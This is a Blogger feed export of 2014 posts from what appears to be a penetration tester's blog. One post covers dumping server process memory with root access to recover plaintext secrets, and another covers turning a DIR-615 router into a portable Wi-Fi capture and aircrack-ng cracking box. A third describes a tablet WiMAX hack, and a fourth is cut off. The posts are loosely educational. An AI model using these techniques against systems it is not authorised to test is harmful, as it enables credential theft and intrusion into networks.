Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4865819153630384661.post-89100439619520542822014-04-10T13:22:00.002+08:002014-04-10T13:22:24.611+08:00Epilogue Pentest: Forget about Heartbleed and Enter the Reality of Volatile Memory<div dir="ltr" style="text-align: left;" trbidi="on">
From <a href="http://xkcd.com/1353/">XKCD</a>..<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://imgs.xkcd.com/comics/heartbleed.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://imgs.xkcd.com/comics/heartbleed.png" height="132" width="320" /></a></div>
<br />
<br />
Yeah there's lot of buzz on heartbleed <b>as the worst bug ever</b>. My opinion? It is <b>a serious bug </b>due to the fallacy of the way C works . Despite the hype memory leakage is not exactly something new and skillful botnet/attackers/pentesters have exploited it for years.<br />
<br />
What can we learn from this bug?.. <b>At the Beginning and at the End of an Encrypted Connection lies the encrypted data. Don`t the trust user input in one thing, but trusting your server memory and hands behind it is also well sucks.</b><br />
<b><br /></b>
If you are one of the CISO fans well PCI often said "<span style="background-color: #f3f3f3; font-family: verdana, arial, helvetica; font-size: 13px; text-align: center;"><b>End-to-End Encryption</b>" .. which means data + communication channel are supposed to be well encrypted.. Which is good</span><br />
<span style="background-color: #f3f3f3; font-family: verdana, arial, helvetica; font-size: 13px; text-align: center;"><br /></span>
<span style="background-color: #f3f3f3; font-family: verdana, arial, helvetica; font-size: 13px; text-align: center;">But there's one catch...</span><br />
<span style="background-color: #f3f3f3; font-family: verdana, arial, helvetica; font-size: 13px; text-align: center;"><br /></span>
<span style="background-color: #f3f3f3; text-align: center;"><span style="font-family: verdana, arial, helvetica; font-size: x-small;">Suppose an attacker/sysadmin managed to get hold on a server with a privileged access (or decided to abused it anyway). Hypothetically something like this.</span></span><br />
<span style="background-color: #f3f3f3; text-align: center;"><span style="font-family: verdana, arial, helvetica; font-size: x-small;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAIRx9nWN1pDQeatHMaW2aSQvlTBqqhAP7kz47sAZhI2LyAnjXyd2Di95100blxvRH41ClrMBTa6iG77h-f9P_Vkyan6QTyJLzXnsHjjh2NyhMjYJG5yUHNM7ZGCpbJVZXEqM1jRWHzSJX/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAIRx9nWN1pDQeatHMaW2aSQvlTBqqhAP7kz47sAZhI2LyAnjXyd2Di95100blxvRH41ClrMBTa6iG77h-f9P_Vkyan6QTyJLzXnsHjjh2NyhMjYJG5yUHNM7ZGCpbJVZXEqM1jRWHzSJX/s1600/Capture.PNG" height="62" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
So we have root privileged. Yes in most tutorial no doubt people will start dumping /etc/shadow and yadax2 implement fake/website blax3.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Suppose that all data is encryted and there's no way to see it in plaintext form.. If you understand the bug in heartbleed , it tells us that unencrypted related data lies in the process memory closely at at the heap/free store..</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmYNf76QjUhFa2iI3JSBQ5wvmPSNUr0HZgwDcPDWGf_qyHIrXBjzBnNB8MuxdIxo3CN5nqnJ3mHj0F87H12S-0UkgGbbhdcT8zfSsnIhLQJK1Z3XhL0UMyB-VB-jiQ_tszH83hcQAx4I-i/s1600/capture2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmYNf76QjUhFa2iI3JSBQ5wvmPSNUr0HZgwDcPDWGf_qyHIrXBjzBnNB8MuxdIxo3CN5nqnJ3mHj0F87H12S-0UkgGbbhdcT8zfSsnIhLQJK1Z3XhL0UMyB-VB-jiQ_tszH83hcQAx4I-i/s1600/capture2.PNG" height="51" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Pick up one process 5356 in this example and examine the maps.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrpll1hRL2erJ8uB_A2OscThj_eb6VGUbtt4x6UjhZbmKjxNTOz5mcG73WJ2Sap7shqT1aAc-TlqnPBFDJcrs9bUPVosoTX58V8q9Oy1XmNqpRCdVUIC8QRUmmHKUy6KGtdooIxYi60zZy/s1600/Capture3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrpll1hRL2erJ8uB_A2OscThj_eb6VGUbtt4x6UjhZbmKjxNTOz5mcG73WJ2Sap7shqT1aAc-TlqnPBFDJcrs9bUPVosoTX58V8q9Oy1XmNqpRCdVUIC8QRUmmHKUy6KGtdooIxYi60zZy/s1600/Capture3.PNG" height="176" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Data memory leaked in heart bleed relies on how the heap was align/rebased/mapped blax3.,</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
We can use gcore or <a href="http://www.rohitab.com/discuss/topic/37806-process-memory-dump-utility/">Folks from Rohitab</a> have created one nice tool similar to procdump in Windows :)</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtiHocUhL_O1glfkvjRUUH1NXcmo3r7OgS35j-BJKDOcoimrfraZRNt7ovJamujp35GoRYVomlEpNQArscwP0SPQgO061trgPAf4Eghk7b2RY-bUcL7yOYewTKsFdkDSjyD0jyQApDjjXX/s1600/Capture4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtiHocUhL_O1glfkvjRUUH1NXcmo3r7OgS35j-BJKDOcoimrfraZRNt7ovJamujp35GoRYVomlEpNQArscwP0SPQgO061trgPAf4Eghk7b2RY-bUcL7yOYewTKsFdkDSjyD0jyQApDjjXX/s1600/Capture4.PNG" height="25" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
And it's a gold mine..</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhScKKP-LitXq1WR1tsMCmPwLhhulmEyl7S3Kdp4NdayBrM2ToTjXAqY4bO2LO16C8lZj1YyAljcPKwDgxxGFFUOjbh45IP8PF10I2kzJJ2JMBBjK4c9_KWj0FHfMvchkoDYtZcxrAEpO58/s1600/capture6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhScKKP-LitXq1WR1tsMCmPwLhhulmEyl7S3Kdp4NdayBrM2ToTjXAqY4bO2LO16C8lZj1YyAljcPKwDgxxGFFUOjbh45IP8PF10I2kzJJ2JMBBjK4c9_KWj0FHfMvchkoDYtZcxrAEpO58/s1600/capture6.PNG" height="208" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
Do you trust your sysadmin? I know I don`t. And dark tips. <i>Don`t trust your router memory either...</i></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
What about dumping in Windows? It's as easy as .</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiddhZPu9d4MKzlp-GaJcfoFLcTJjVj4HKkfBHWW2doNx_ofdo57vYKgE-70BO7ZPeCWjygjIrkrpr2ZwfUDZJSxE4R6HM6WxrZcr4WcZayet2ixXc644sMV_51q2ZF8GoTxfFtRiP7ndx/s1600/Capture7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiddhZPu9d4MKzlp-GaJcfoFLcTJjVj4HKkfBHWW2doNx_ofdo57vYKgE-70BO7ZPeCWjygjIrkrpr2ZwfUDZJSxE4R6HM6WxrZcr4WcZayet2ixXc644sMV_51q2ZF8GoTxfFtRiP7ndx/s1600/Capture7.png" height="68" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Volatile memory are dangerous... </b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<span style="background-color: #f3f3f3; text-align: center;"><span style="font-family: verdana, arial, helvetica; font-size: x-small;"><br /></span></span>
<span style="background-color: #f3f3f3; text-align: center;"><span style="font-family: verdana, arial, helvetica; font-size: x-small;"><br /></span></span>
<b><br /></b>
<b><br /></b></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4865819153630384661.post-18052977188921258502014-04-06T15:58:00.003+08:002014-04-06T15:59:44.626+08:00Transform your Dir-615 TM into a Wifi Dumper/Cracking Machine<div dir="ltr" style="text-align: left;" trbidi="on">
My health is not that good lately, for some reason , I was diagnosed for asthma few days ago. <div>
<br /></div>
<div>
During Wireless Penetration Testing analysis , i often found that people love to talk about some china/brand wireless card such as SignalKing/Alpha etcx3. While those card might work , it's not portable enough due to the fact you need a PC/Notebook nearby in order to powered up those devices. Which is not good for professional lazy pentester. </div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i00.i.aliimg.com/wsphoto/v1/544601914_1/High-Power-SignalKing-font-b-Signal-b-font-font-b-King-b-font-48DBI-USB-font.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i00.i.aliimg.com/wsphoto/v1/544601914_1/High-Power-SignalKing-font-b-Signal-b-font-font-b-King-b-font-48DBI-USB-font.jpg" height="320" width="320" /></a> </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9dYqo04MAwICIXin2O_PGjPdII1FXfzBW2kImcy2t0cTk7a2I3Qss5M15W2iJIfZVf057LLy2ViuhRaTMPxRZL0QtRyPhHVkM6JMyq1fKjbl9XY-viyPkzt47IowU_MvDeTLe5ou6mHs/s1600/Alfa_USB_500mw_Wifi_Adapter_Awus036h.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9dYqo04MAwICIXin2O_PGjPdII1FXfzBW2kImcy2t0cTk7a2I3Qss5M15W2iJIfZVf057LLy2ViuhRaTMPxRZL0QtRyPhHVkM6JMyq1fKjbl9XY-viyPkzt47IowU_MvDeTLe5ou6mHs/s1600/Alfa_USB_500mw_Wifi_Adapter_Awus036h.jpg" height="320" width="320" /></a></div>
<div>
<br /></div>
<div>
So the solution? Turn your antics DIR-615 into a portable wireless monster machine!!!</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwas-BwtC3FjVTTTdiXDuBeCcfm8r8wrxbHHRoMoG3WIOk1qWTzWmZ7TksMvIkbTNN7spvXZ1-vs9UBhJbrTBDJ2qHqpVzJXLnw_oLQh13RzNnKFL_iQPql66w9_IvZzbuG70VZxD0mrEV/s1600/photo+(6).JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwas-BwtC3FjVTTTdiXDuBeCcfm8r8wrxbHHRoMoG3WIOk1qWTzWmZ7TksMvIkbTNN7spvXZ1-vs9UBhJbrTBDJ2qHqpVzJXLnw_oLQh13RzNnKFL_iQPql66w9_IvZzbuG70VZxD0mrEV/s1600/photo+(6).JPG" height="276" width="320" /></a></div>
<div>
<br /></div>
<div>
Disclaimer (If you screw somewhere along the way), well too bad</div>
<div>
<br /></div>
<div>
Steps.1 Flash DIR615 with this firmware ..http://downloads.openwrt.org/attitude_adjustment/12.09/ramips/rt305x/openwrt-ramips-rt305x-dir-615-d-squashfs-factory.bin</div>
<div>
<br /></div>
<div>
To flash you are required to turn off your DIR-615 machine, and hold the reset button for a few seconds, u set your IP to 192.168.0.x>1 , go to 192.168.0.1 and you will be redirected to the firmware upgrade page.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://studentprojects.files.wordpress.com/2011/09/ddwrt_guide1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://studentprojects.files.wordpress.com/2011/09/ddwrt_guide1.png" height="231" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
Upload the firmware.</div>
<div>
<br /></div>
<div>
Step2. </div>
<div>
<ul style="text-align: left;">
<li>Download the sysupgrade firmware http://downloads.openwrt.org/attitude_adjustment/12.09/ramips/rt305x/openwrt-ramips-rt305x-dir-620-a1-squashfs-sysupgrade.bin </li>
<li>Setup openwrt initially</li>
<li>Push sysupgrade into openwrt via scp to /tmp</li>
<li>ssh into your openwrt and use the sysupgrade -v openwrt-ramips-rt305x-dir-620-a1-squashfs-sysupgrade.bin</li>
</ul>
<div>
<br /></div>
</div>
<div>
Step 3</div>
<div>
<ul style="text-align: left;">
<li>If you have luci you can set the wifi into Monitor mode via Luci HTTP.<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEif5_IbffWED4acJ2cjlqdtle3uYECiR8kLjIGh9GaMFXNEPFgixA2u_f8XZGNVV2bYSsWxcLBOQCyOcNqH_GlOLIpgkVFGlMBrMYc9s6F3uk4URV167x629dFYLEUbHrbhSkfDGQjkfmOJ/s1600/capture6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEif5_IbffWED4acJ2cjlqdtle3uYECiR8kLjIGh9GaMFXNEPFgixA2u_f8XZGNVV2bYSsWxcLBOQCyOcNqH_GlOLIpgkVFGlMBrMYc9s6F3uk4URV167x629dFYLEUbHrbhSkfDGQjkfmOJ/s1600/capture6.PNG" height="151" width="320" /></a></div>
</li>
<li>or modified /etc/config/wireless to be something like this<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPDfdI9sM1-H4KbLNwooIrTEcQOPxx-7J0ub6kzFNPYKztEIRw3FLziBF10-FXcxY1iPS-O9Bs6LokhTV1KAU4e0Lk0KScopP9EQ21m0YH1J2mOLB0_Kd2jJejEZRD6sENLX7_zwFybHWP/s1600/capturr7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPDfdI9sM1-H4KbLNwooIrTEcQOPxx-7J0ub6kzFNPYKztEIRw3FLziBF10-FXcxY1iPS-O9Bs6LokhTV1KAU4e0Lk0KScopP9EQ21m0YH1J2mOLB0_Kd2jJejEZRD6sENLX7_zwFybHWP/s1600/capturr7.png" height="233" width="320" /></a></div>
</li>
</ul>
</div>
<div>
<br /></div>
<div>
<ul style="text-align: left;">
<li>Tips your openwrt should`t have Internet connection, opkg relies on wget which respect http_proxy env,, I used polipo proxy so to make opkg works i usually use ssh root@192.168.1.1 -R8123:localhost:8123 </li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5hlx2ivG746W8ldrfcGAK78hXX5FiuUp52WRLNRnAJf4Dps0EvloejsescKxi_GXhxc8YKupOY3JFP1t0Fu9ju5B2WCtBO512aNjkWIY2PZNEVTsHLpXj4fyaAUoR4P-TSN7tFZkoylzg/s1600/capture8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5hlx2ivG746W8ldrfcGAK78hXX5FiuUp52WRLNRnAJf4Dps0EvloejsescKxi_GXhxc8YKupOY3JFP1t0Fu9ju5B2WCtBO512aNjkWIY2PZNEVTsHLpXj4fyaAUoR4P-TSN7tFZkoylzg/s1600/capture8.png" height="156" width="320" /></a></div>
<div>
<br /></div>
</div>
<div>
After that install <i>opkg install aircrack-ng kmod-usb-storage kmod-fs-vfat wireless-tools screen</i> . Try not to install too much stuff since space is very <b>limited</b>.</div>
<div>
<br /></div>
<div>
And that's it. use <i>screen</i> to deamonized your stuff.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0cJoRU2h_04xVV3LIQ1HTXAITNTvmHUIi-aXx-iqDifMf_t5BUZE8KXTusvYKSg9gaXlbJGWOYe4Xdjeeqoqt5uYAUw1gM-QYz9coxJS_trwbVAG9Yb68vry-lkbPTAGU-BhgH3u0lWQO/s1600/crap9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0cJoRU2h_04xVV3LIQ1HTXAITNTvmHUIi-aXx-iqDifMf_t5BUZE8KXTusvYKSg9gaXlbJGWOYe4Xdjeeqoqt5uYAUw1gM-QYz9coxJS_trwbVAG9Yb68vry-lkbPTAGU-BhgH3u0lWQO/s1600/crap9.png" height="105" width="320" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Knowledge about dumping to your usb drive and airocrack usage is left for your own exercise..</div>
<div>
<br /></div>
<div>
By the way, <a href="http://www.thestar.com.my/news/nation/2013/09/13/it-is-illegal-to-ride-on-anothers-wifi-connection-says-mcmc.aspx">It is illegal to steal Wifi in Malaysia</a>. .. This is just a simple tutorial on how yet to built your own powerful portable wifi-pentesting machine.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4865819153630384661.post-44289566826381364232014-03-19T00:41:00.002+08:002014-03-19T00:55:16.146+08:00Poor man Tablet Wimax Yes 4G... (Probably the first one in Malaysia)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: left;">
<i>Note: Just because i criticized YES services, doesn't mean that I hate em. . In fact their network performance would make P(2-1) looks like pea one.. But there's always room for improvement. After all real hacker innovate , mutate, making bidaah hasanah for the greater good and fun.</i></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
After the <a href="http://y0nd13.blogspot.com/2014/03/poor-man-yes4g-huddle.html">PoC of turning your rasp pi into a fullblown Yes Zoom.</a> I just browse one day to see what the YTl/Yes Guys are up to.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYmUum5OYE7Swu1bIDRRUIxTlMu30gNtYCWyMZG8pRkIKLRz-CGNSWehAfFE7nnA_vjETZCW74499w6wnuxaNONa75qIntEod6RxQ2nNb4K-4wv6IJXfL3MJcCUzxHst2Z4s81InQCtfaE/s1600/poorr1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYmUum5OYE7Swu1bIDRRUIxTlMu30gNtYCWyMZG8pRkIKLRz-CGNSWehAfFE7nnA_vjETZCW74499w6wnuxaNONa75qIntEod6RxQ2nNb4K-4wv6IJXfL3MJcCUzxHst2Z4s81InQCtfaE/s1600/poorr1.png" height="127" width="320" /></a></div>
It's great they are giving free *(with conditional surrender/subscribtion) tablet for 99 lucky people. However those tablet doesn`t come with a built-in WIMAX features which is a sad thing. We have 3g, 4g but meany capitalistic industrialist make Wimax as a foster child ..<br />
<br />
So my favpurite guru poisoned me with the idea , make it work with tablet.<br />
<br />
Hardware Requiremnet<br />
1. Samsung Galaxy Tab 10.1 P7500<br />
2. Yes4G Dongle<br />
3. OTG cable with External Power (5V 2A) type explain later.<br />
<br />
1. You can us any ROM that you like but my choice would be plain stock cynogen with tun enabled and also access to libusb. This is important as gctwimax driver require user space.<br />
<br />
2. According to <a href="http://www.usb.org/developers/onthego/otg1_0.pdf">OTG 1.0</a> specification the device plugged in are using current between 8ma to 100mA . It couldn`t drive more power due to design/current limit (*on nexus 7 it's the kernel) ... And unfortunely Yes4G Dongle use at least 500mA . We can verified this by going to Device Manager and check the power.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnocdcAm3mEHfHlklez1-GdPV-0xeqTBo2NxTwnd6WhRTqtwDo7SOyMF7IHPoR-7wA_7VjIUQ9TjLUxenHo5vD6NV0FuuxqmVZgaIA4uLhyphenhyphenrtkhS7o1TBkAczBJnFo8M0KILntgyX7uSTX/s1600/poorr1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnocdcAm3mEHfHlklez1-GdPV-0xeqTBo2NxTwnd6WhRTqtwDo7SOyMF7IHPoR-7wA_7VjIUQ9TjLUxenHo5vD6NV0FuuxqmVZgaIA4uLhyphenhyphenrtkhS7o1TBkAczBJnFo8M0KILntgyX7uSTX/s1600/poorr1.png" height="320" width="288" /></a></div>
3. So yeah we need an OTG cable with extra power. a simple powerbank should be sufficient.<br />
<br />
4. I`m using <a href="http://linuxonandroid.org/">linuxonandroid </a>to ease the development . Compiling gctwimax is straightforward once u chroot into it.. but problem occured when you try to run the gctwimax dialer.<br />
<br />
5. The solution that i used is a very one hell bad hack.<br />
<br />
$bbox mount --bind /dev/bus $mount/dev/bus<br />
$bbox mknod $mnt/dev/net/tun c 10 200<br />
<div>
<br /></div>
<div>
6. You also need to run dhcpd wimax0 outside of the chroot enviroment. If nesscary dns server can be set using setprop command.. If everything goes well!! Congratulation u r one of the luckiest bast&^d using wimax on a tablet natively.</div>
<div>
<br /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj06qI-jVPMe-bAR35ozF-vlTsBKY9yCTc3HxYx41hJeZB8ibPSq0AOF9LAKoQ0zbrZ0ltfz6FILB78k-3VE7RBO2h-q25QomVj8bq6BRwLnehPvhejprb_gCaKOlj-9BnYBVLkYWiHXvDF/s1600/10001514_10202971368500592_1336721922_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj06qI-jVPMe-bAR35ozF-vlTsBKY9yCTc3HxYx41hJeZB8ibPSq0AOF9LAKoQ0zbrZ0ltfz6FILB78k-3VE7RBO2h-q25QomVj8bq6BRwLnehPvhejprb_gCaKOlj-9BnYBVLkYWiHXvDF/s1600/10001514_10202971368500592_1336721922_n.jpg" height="240" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
Everything works perfectly. U can see Wifi is turned off and of course i didn`t have any sim card.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZUQr8dQ8mmeyOgvuDcpHSteSPB9lf3rJUlBkg7RFWNftgG7jSnQmW7WvZ80K54c7xqv2mv5Im6QGkgZBxkJebQRtFJ0WkigJZciuSCn2d3iT-EDIU72TrPyhqTUtPZ7n2eaKB9GD7m6r2/s1600/Screenshot_2014-03-18-18-47-51.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZUQr8dQ8mmeyOgvuDcpHSteSPB9lf3rJUlBkg7RFWNftgG7jSnQmW7WvZ80K54c7xqv2mv5Im6QGkgZBxkJebQRtFJ0WkigJZciuSCn2d3iT-EDIU72TrPyhqTUtPZ7n2eaKB9GD7m6r2/s1600/Screenshot_2014-03-18-18-47-51.png" height="200" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
USB Device are detected correctly and Intepret correctly as a Modem instead of Mass Storage.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiolrwJ99r6kcFstqQHxpoKCBEV-JFwMCwKcSUC-o5Ym6C-5B_hZ1h31974FJYjezJb7gAKu0uZUP_TaeLLhJrccc8S2mfDtncvR_-AX4S7rNKWbTFliBFQaxWjLYBFj6lriGqSSNlW3I9H/s1600/Screenshot_2014-03-18-19-08-13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiolrwJ99r6kcFstqQHxpoKCBEV-JFwMCwKcSUC-o5Ym6C-5B_hZ1h31974FJYjezJb7gAKu0uZUP_TaeLLhJrccc8S2mfDtncvR_-AX4S7rNKWbTFliBFQaxWjLYBFj6lriGqSSNlW3I9H/s1600/Screenshot_2014-03-18-19-08-13.png" height="200" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
IP are being deligated properly.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAOMfbBI-uDibHRPI5X4Jo6OPIW7r4lzR_WW2lS9nulJ4j6j1QeHJ0QFQcZKo65hjdAD7vaX3_IyCZqc_hB4iyMWf6q2A8Fhj5_kYvigR3OrH1xeL9ABnUoB1MLn10hESIiOTWYV3ksZMW/s1600/Screenshot_2014-03-18-19-20-20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAOMfbBI-uDibHRPI5X4Jo6OPIW7r4lzR_WW2lS9nulJ4j6j1QeHJ0QFQcZKo65hjdAD7vaX3_IyCZqc_hB4iyMWf6q2A8Fhj5_kYvigR3OrH1xeL9ABnUoB1MLn10hESIiOTWYV3ksZMW/s1600/Screenshot_2014-03-18-19-20-20.png" height="200" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
Yeap it's working..</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
P/S: This is probably the first Tablet with Yes4G powered natively in Malaysia. Can someone submit it to the Malaysia book of Record (Do we still have that crap? ) Lolz.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>List To DO:</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b>1. Make this thing cleaner.</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b>2. Using ScriptManager to automate stuff.</b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4865819153630384661.post-90233678600618539802014-03-07T00:13:00.002+08:002014-03-07T02:26:55.133+08:00Poor man Yes4G Huddle.<div dir="ltr" style="text-align: left;" trbidi="on">
Yes4g Huddle is bloody pricey . Anything that is more then RM300 is expensive in my own devices pricing schema ... I do not know what's the justification for that kind of price.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
